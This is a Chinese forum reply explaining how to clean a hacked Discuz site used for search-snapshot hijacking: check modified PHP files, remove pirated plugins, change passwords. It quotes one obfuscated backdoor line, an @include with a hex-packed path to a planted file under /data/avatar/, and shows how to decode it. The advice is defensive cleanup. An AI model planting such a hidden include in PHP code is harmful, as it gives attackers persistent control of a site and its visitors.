- 積分
- 3569
- 金幣
- 351 個
- 社區(qū)幣
- 0 元
功行圓滿
- 貢獻
- 23 點
- 金幣
- 351 個
|
板凳
發(fā)表于 2020-9-11 01:55:41
|英國|
只看Ta
若存在,處理前,先卸載所有盜版插件與模版。
進discuz后臺找到工具-文件校驗,看下最近有哪些php文件被修改了。
1、排查網(wǎng)站源文件的php 文件,查看是否有出現(xiàn)IP地址、或者異常網(wǎng)站(上面跳轉(zhuǎn)的網(wǎng)站),如果有刪除就可以了。
2、排查網(wǎng)站源文件的php 文件,查看是否有如下代碼:@include($_SERVER['DOCUMENT_ROOT']
(排查一般用WEBshell后門掃描軟件掃描核查!)
如果有就刪除此段代碼。并把該段代碼進行解密。
舉例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));
需要解密的代碼為:2F646174612F6176617461722F30
解密后為:/data/avatar/0
代碼解密地址:http://www.bejson.com/convert/ox2str/
意思就是在上述路徑下存在被非法上傳的文件,用于做快照劫持。
解決辦法:刪除上面的代碼和文件即可。
掛馬問題解決了后,記得更改服務器相關(guān)的各種密碼,盡量設(shè)置的復雜一點。
|
|